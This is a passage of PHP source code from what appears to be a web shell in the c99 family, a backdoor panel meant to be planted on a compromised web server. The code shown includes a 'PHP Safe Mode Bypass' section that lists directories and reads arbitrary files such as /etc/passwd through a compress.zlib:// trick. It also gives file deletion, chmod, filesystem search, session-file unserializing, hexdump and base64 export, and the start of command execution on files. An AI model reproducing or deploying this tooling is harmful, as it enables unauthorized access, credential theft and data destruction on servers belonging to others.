  3850.   echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#15354c borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
  3851.  
  3852.   foreach($table as $row)
  3853.  
  3854.   {
  3855.  
  3856.    echo "<tr>\r\n";
  3857.  
  3858.    foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
  3859.  
  3860.    echo "</tr>\r\n";
  3861.  
  3862.   }
  3863.  
  3864.   echo "</table><br><hr size=\"1\" noshade><p align=\"right\">
  3865.  
  3866.  <script>
  3867.  
  3868.  function ls_setcheckboxall(status)
  3869.  
  3870.  {
  3871.  
  3872.   var id = 1;
  3873.  
  3874.   var num = ".(count($table)-2).";
  3875.  
  3876.   while (id <= num)
  3877.  
  3878.   {
  3879.  
  3880.    document.getElementById('actbox'+id).checked = status;
  3881.  
  3882.    id++;
  3883.  
  3884.   }
  3885.  
  3886.  }
  3887.  
  3888.  function ls_reverse_all()
  3889.  
  3890.  {
  3891.  
  3892.   var id = 1;
  3893.  
  3894.   var num = ".(count($table)-2).";
  3895.  
  3896.   while (id <= num)
  3897.  
  3898.   {
  3899.  
  3900.    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
  3901.  
  3902.    id++;
  3903.  
  3904.   }
  3905.  
  3906.  }
  3907.  
  3908.  </script>
  3909.  
  3910.  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
  3911.  
  3912.  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
  3913.  
  3914.   if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  3915.  
  3916.   {
  3917.  
  3918.    echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  3919.  
  3920.   }
  3921.  
  3922.   echo "<select name=act><option value=\"".$act."\">With selected:</option>";
  3923.  
  3924.   echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  3925.  
  3926.   echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  3927.  
  3928.   if ($usefsbuff)
  3929.  
  3930.   {
  3931.  
  3932.    echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
  3933.  
  3934.    echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
  3935.  
  3936.    echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  3937.  
  3938.   }
  3939.  
  3940.   echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
  3941.  
  3942.   echo "</form><hr size=\"1\" noshade>";
  3943.  }
  3944.  ?>
  3945. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" borderColorLight=#c0c0c0 border=1>
  3946.      <tr> <!-- 1 -->
  3947.        <td valign="top" width="33%" ><p align="center"><b>:: PHP Safe Mode Bypass ::</b></p></td>
  3948.        <td valign="top" width="33%" ><p align="center"><b>:: Make File/Directory ::</b></p></td>
  3949.        <td valign="top" ><p align="center"><b>:: Go File/Directory ::</b></p></td>
  3950.      </tr>
  3951.      <tr><!-- 3 -->
  3952.      <td valign="top">
  3953.  
  3954.    <center><b>(: List Directories :)</b>    <form action="<?php echo $surl; ?>">
  3955.  
  3956.       <div align="center"><br>
  3957.  
  3958.       Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br></div>
  3959. <?php
  3960.  
  3961.    
  3962.  
  3963.     function rsg_glob()
  3964.  
  3965. {
  3966.  
  3967. $chemin=$_GET['directory'];
  3968.  
  3969. $files = glob("$chemin*");
  3970.  
  3971. echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
  3972.  
  3973. foreach ($files as $filename) {
  3974.  
  3975.     echo "<pre>";
  3976.  
  3977.    echo "$filename\n";
  3978.  
  3979.    echo "</pre>";
  3980.  
  3981. }
  3982.  
  3983. }
  3984.  
  3985.  
  3986.  
  3987. if(isset($_GET['directory']))
  3988.  
  3989. {
  3990.  
  3991. rsg_glob();
  3992.  
  3993. }
  3994.  
  3995.  
  3996.  
  3997. ?>
  3998.  
  3999.  
  4000.     </form></center>
  4001.  
  4002.     </td>
  4003.      <td>
  4004.      <center><b>[: Make Directory :]</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
  4005.      </td>
  4006.      <td>
  4007.      <center><b>{: Go Directory :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
  4008.      </td>
  4009.      </tr>
  4010.           <tr><!-- 2 -->
  4011.         <td valign="top">
  4012.  
  4013.          <div align="center"><b>(: Read Files :)</b></div><br>
  4014.  
  4015.          <form action="<?php echo $surl; ?>">
  4016.  
  4017.             <div align="center">File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
  4018.             <?php    
  4019.  
  4020.       function rsg_read()
  4021.  
  4022.     {  
  4023.  
  4024.     $test="";
  4025.  
  4026.     $temp=tempnam($test, "cx");
  4027.  
  4028.     $file=$_GET['file'];   
  4029.  
  4030.     $get=htmlspecialchars($file);
  4031.  
  4032.     echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
  4033.  
  4034.     if(copy("compress.zlib://".$file, $temp)){
  4035.  
  4036.     $fichier = fopen($temp, "r");
  4037.  
  4038.     $action = fread($fichier, filesize($temp));
  4039.  
  4040.     fclose($fichier);
  4041.  
  4042.     $source=htmlspecialchars($action);
  4043.  
  4044.     echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
  4045.  
  4046.     unlink($temp);
  4047.  
  4048.     } else {
  4049.  
  4050.     die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
  4051.  
  4052.     <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
  4053.  
  4054.     access.</CENTER></FONT>");
  4055.  
  4056.             }
  4057.  
  4058.     echo "</div>";
  4059.  
  4060.     }
  4061.  
  4062.    
  4063.  
  4064.     if(isset($_GET['file']))
  4065.  
  4066. {
  4067.  
  4068. rsg_read();
  4069.  
  4070. }
  4071.  
  4072.    
  4073.  
  4074.     ?>
  4075.            
  4076.  
  4077.           <br>
  4078.  
  4079.       </div>
  4080.  
  4081.          </form>
  4082.  
  4083.         </td>
  4084.         <td >
  4085.         <center><b>[: Make File :]</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
  4086.         </td>
  4087.         <td>
  4088.         <center><b>{: Go File :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
  4089.         </td>
  4090.        
  4091.      </tr>
  4092.      
  4093.  </table> <?php
  4094.  }
  4095.  
  4096.  
  4097. if ($act == "delete")
  4098.  
  4099. {
  4100.  
  4101.  $delerr = "";
  4102.  
  4103.  foreach ($actbox as $v)
  4104.  
  4105.  {
  4106.  
  4107.   $result = FALSE;
  4108.  
  4109.   $result = fs_rmobj($v);
  4110.  
  4111.   if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  4112.  
  4113.  }
  4114.  
  4115.  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  4116.  
  4117.  $act = "ls";
  4118.  
  4119. }
  4120.  
  4121. if ($act == "chmod")
  4122.  
  4123. {
  4124.  
  4125.  $mode = fileperms($d.$f);
  4126.  
  4127.  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  4128.  
  4129.  else
  4130.  
  4131.  {
  4132.  
  4133.   $form = TRUE;
  4134.  
  4135.   if ($chmod_submit)
  4136.  
  4137.   {
  4138.  
  4139.    $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  4140.  
  4141.    if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
  4142.  
  4143.    else {$err = "Can't chmod to ".$octet.".";}
  4144.  
  4145.   }
  4146.  
  4147.   if ($form)
  4148.  
  4149.   {
  4150.  
  4151.    $perms = parse_perms($mode);
  4152.  
  4153.    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  4154.  
  4155.   }
  4156.  
  4157.  }
  4158.  
  4159. }
  4160.  
  4161. if ($act == "search")
  4162.  
  4163. {
  4164.  
  4165.  echo "<b>Search in file-system:</b><br>";
  4166.  
  4167.  if (empty($search_in)) {$search_in = $d;}
  4168.  
  4169.  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  4170.  
  4171.  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  4172.  
  4173.  if (!empty($submit))
  4174.  
  4175.  {
  4176.  
  4177.   $found = array();
  4178.  
  4179.   $found_d = 0;
  4180.  
  4181.   $found_f = 0;
  4182.  
  4183.   $search_i_f = 0;
  4184.  
  4185.   $search_i_d = 0;
  4186.  
  4187.   $a = array
  4188.  
  4189.   (
  4190.  
  4191.    "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  4192.  
  4193.    "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  4194.  
  4195.    "text_wwo"=>$search_text_wwo,
  4196.  
  4197.    "text_cs"=>$search_text_cs,
  4198.  
  4199.    "text_not"=>$search_text_not
  4200.  
  4201.   );
  4202.  
  4203.   $searchtime = getmicrotime();
  4204.  
  4205.   $in = array_unique(explode(";",$search_in));
  4206.  
  4207.   foreach($in as $v) {cyb3rfsearch($v);}
  4208.  
  4209.   $searchtime = round(getmicrotime()-$searchtime,4);
  4210.  
  4211.   if (count($found) == 0) {echo "<b>No files found!</b>";}
  4212.  
  4213.   else
  4214.  
  4215.   {
  4216.  
  4217.    $ls_arr = $found;
  4218.  
  4219.    $disp_fullpath = TRUE;
  4220.  
  4221.    $act = "ls";
  4222.  
  4223.   }
  4224.  
  4225.  }
  4226.  
  4227.  echo "<form method=POST>
  4228.  
  4229. <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
  4230.  
  4231. <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
  4232.  
  4233. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  4234.  
  4235. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  4236.  
  4237. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
  4238.  
  4239. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
  4240.  
  4241. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
  4242.  
  4243. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
  4244.  
  4245. <br><br><input type=submit name=submit value=\"Search\"></form>";
  4246.  
  4247.  if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
  4248.  
  4249. }
  4250.  
  4251. if ($act == "fsbuff")
  4252.  
  4253. {
  4254.  
  4255.  $arr_copy = $sess_data["copy"];
  4256.  
  4257.  $arr_cut = $sess_data["cut"];
  4258.  
  4259.  $arr = array_merge($arr_copy,$arr_cut);
  4260.  
  4261.  if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  4262.  
  4263.  else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
  4264.  
  4265. }
  4266.  
  4267. if ($act == "d")
  4268.  
  4269. {
  4270.  
  4271.  if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
  4272.  
  4273.  else
  4274.  
  4275.  {
  4276.  
  4277.   echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  4278.  
  4279.   if (!$win)
  4280.  
  4281.   {
  4282.  
  4283.    echo "<tr><td><b>Owner/Group</b></td><td> ";
  4284.  
  4285.    $ow = posix_getpwuid(fileowner($d));
  4286.  
  4287.    $gr = posix_getgrgid(filegroup($d));
  4288.  
  4289.    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  4290.  
  4291.   }
  4292.  
  4293.   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  4294.  
  4295.  }
  4296.  
  4297. }
  4298.  
  4299. if ($act == "chmod")
  4300.  
  4301. {
  4302.  
  4303.  $mode = fileperms($d.$f);
  4304.  
  4305.  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  4306.  
  4307.  else
  4308.  
  4309.  {
  4310.  
  4311.   $form = TRUE;
  4312.  
  4313.   if ($chmod_submit)
  4314.  
  4315.   {
  4316.  
  4317.    $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  4318.  
  4319.    if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
  4320.  
  4321.    else {$err = "Can't chmod to ".$octet.".";}
  4322.  
  4323.   }
  4324.  
  4325.   if ($form)
  4326.  
  4327.   {
  4328.  
  4329.    $perms = parse_perms($mode);
  4330.  
  4331.    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  4332.  
  4333.   }
  4334.  
  4335.  }
  4336.  
  4337. }
  4338.  
  4339. if ($act == "f")
  4340.  
  4341. {
  4342.  
  4343.  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
  4344.  
  4345.  {
  4346.  
  4347.   if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  4348.  
  4349.   else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  4350.  
  4351.  }
  4352.  
  4353.  else
  4354.  
  4355.  {
  4356.  
  4357.   $r = @file_get_contents($d.$f);
  4358.  
  4359.   $ext = explode(".",$f);
  4360.  
  4361.   $c = count($ext)-1;
  4362.  
  4363.   $ext = $ext[$c];
  4364.  
  4365.   $ext = strtolower($ext);
  4366.  
  4367.   $rft = "";
  4368.  
  4369.   foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  4370.  
  4371.   if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  4372.  
  4373.   if (empty($ft)) {$ft = $rft;}
  4374.  
  4375.   $arr = array(
  4376.  
  4377.    array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
  4378.  
  4379.    array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
  4380.  
  4381.    array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
  4382.  
  4383.    array("Code","code"),
  4384.  
  4385.    array("Session","phpsess"),
  4386.  
  4387.    array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
  4388.  
  4389.    array("SDB","sdb"),
  4390.  
  4391.    array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
  4392.  
  4393.    array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
  4394.  
  4395.    array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
  4396.  
  4397.    array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
  4398.  
  4399.    array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
  4400.  
  4401.   );
  4402.  
  4403.   echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  4404.  
  4405.   foreach($arr as $t)
  4406.  
  4407.   {
  4408.  
  4409.    if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
  4410.  
  4411.    elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
  4412.  
  4413.    else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
  4414.  
  4415.    echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  4416.  
  4417.   }
  4418.  
  4419.   echo "<hr size=\"1\" noshade>";
  4420.  
  4421.   if ($ft == "info")
  4422.  
  4423.   {
  4424.  
  4425.    echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  4426.  
  4427.    if (!$win)
  4428.  
  4429.    {
  4430.  
  4431.     echo "<tr><td><b>Owner/Group</b></td><td> ";    
  4432.  
  4433.     $ow = posix_getpwuid(fileowner($d.$f));
  4434.  
  4435.     $gr = posix_getgrgid(filegroup($d.$f));
  4436.  
  4437.     echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  4438.  
  4439.    }
  4440.  
  4441.    echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
  4442.  
  4443.    $fi = fopen($d.$f,"rb");
  4444.  
  4445.    if ($fi)
  4446.  
  4447.    {
  4448.  
  4449.     if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
  4450.  
  4451.     else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  4452.  
  4453.     $n = 0;
  4454.  
  4455.     $a0 = "00000000<br>";
  4456.  
  4457.     $a1 = "";
  4458.  
  4459.     $a2 = "";
  4460.  
  4461.     for ($i=0; $i<strlen($str); $i++)
  4462.  
  4463.     {
  4464.  
  4465.      $a1 .= sprintf("%02X",ord($str[$i]))." ";
  4466.  
  4467.      switch (ord($str[$i]))
  4468.  
  4469.      {
  4470.  
  4471.       case 0:  $a2 .= "<font>0</font>"; break;
  4472.  
  4473.       case 32:
  4474.  
  4475.       case 10:
  4476.  
  4477.       case 13: $a2 .= "&nbsp;"; break;
  4478.  
  4479.       default: $a2 .= htmlspecialchars($str[$i]);
  4480.  
  4481.      }
  4482.  
  4483.      $n++;
  4484.  
  4485.      if ($n == $hexdump_rows)
  4486.  
  4487.      {
  4488.  
  4489.       $n = 0;
  4490.  
  4491.       if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  4492.  
  4493.       $a1 .= "<br>";
  4494.  
  4495.       $a2 .= "<br>";
  4496.  
  4497.      }
  4498.  
  4499.     }
  4500.  
  4501.     //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
  4502.  
  4503.     echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
  4504.  
  4505.    }
  4506.  
  4507.    $encoded = "";
  4508.  
  4509.    if ($base64 == 1)
  4510.  
  4511.    {
  4512.  
  4513.     echo "<b>Base64 Encode</b><br>";
  4514.  
  4515.     $encoded = base64_encode(file_get_contents($d.$f));
  4516.  
  4517.    }
  4518.  
  4519.    elseif($base64 == 2)
  4520.  
  4521.    {
  4522.  
  4523.     echo "<b>Base64 Encode + Chunk</b><br>";
  4524.  
  4525.     $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  4526.  
  4527.    }
  4528.  
  4529.    elseif($base64 == 3)
  4530.  
  4531.    {
  4532.  
  4533.     echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  4534.  
  4535.     $encoded = base64_encode(file_get_contents($d.$f));
  4536.  
  4537.     $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  4538.  
  4539.    }
  4540.  
  4541.    elseif($base64 == 4)
  4542.  
  4543.    {
  4544.  
  4545.     $text = file_get_contents($d.$f);
  4546.  
  4547.     $encoded = base64_decode($text);
  4548.  
  4549.     echo "<b>Base64 Decode";
  4550.  
  4551.     if (base64_encode($encoded) != $text) {echo " (failed)";}
  4552.  
  4553.     echo "</b><br>";
  4554.  
  4555.    }
  4556.  
  4557.    if (!empty($encoded))
  4558.  
  4559.    {
  4560.  
  4561.     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  4562.  
  4563.    }
  4564.  
  4565.    echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  4566.  
  4567. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  4568.  
  4569. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  4570.  
  4571. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  4572.  
  4573. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  4574.  
  4575. <P>";
  4576.  
  4577.   }
  4578.  
  4579.   elseif ($ft == "html")
  4580.  
  4581.   {
  4582.  
  4583.    if ($white) {@ob_clean();}
  4584.  
  4585.    echo $r;
  4586.  
  4587.    if ($white) {ghostext();}
  4588.  
  4589.   }
  4590.  
  4591.   elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  4592.  
  4593.   elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  4594.  
  4595.   elseif ($ft == "phpsess")
  4596.  
  4597.   {
  4598.  
  4599.    echo "<pre>";
  4600.  
  4601.    $v = explode("|",$r);
  4602.  
  4603.    echo $v[0]."<br>";
  4604.  
  4605.    var_dump(unserialize($v[1]));
  4606.  
  4607.    echo "</pre>";
  4608.  
  4609.   }
  4610.  
  4611.   elseif ($ft == "exe")
  4612.  
  4613.   {
  4614.  
  4615.    $ext = explode(".",$f);
  4616.  
  4617.    $c = count($ext)-1;
  4618.  
  4619.    $ext = $ext[$c];
  4620.  
  4621.    $ext = strtolower($ext);
  4622.  
  4623.    $rft = "";
  4624.  
  4625.    foreach($exeftypes as $k=>$v)
  4626.  
  4627.    {
  4628.  
  4629.     if (in_array($ext,$v)) {$rft = $k; break;}
  4630.  
  4631.    }
  4632.  
  4633.    $cmd = str_replace("%f%",$f,$rft);
  4634.  
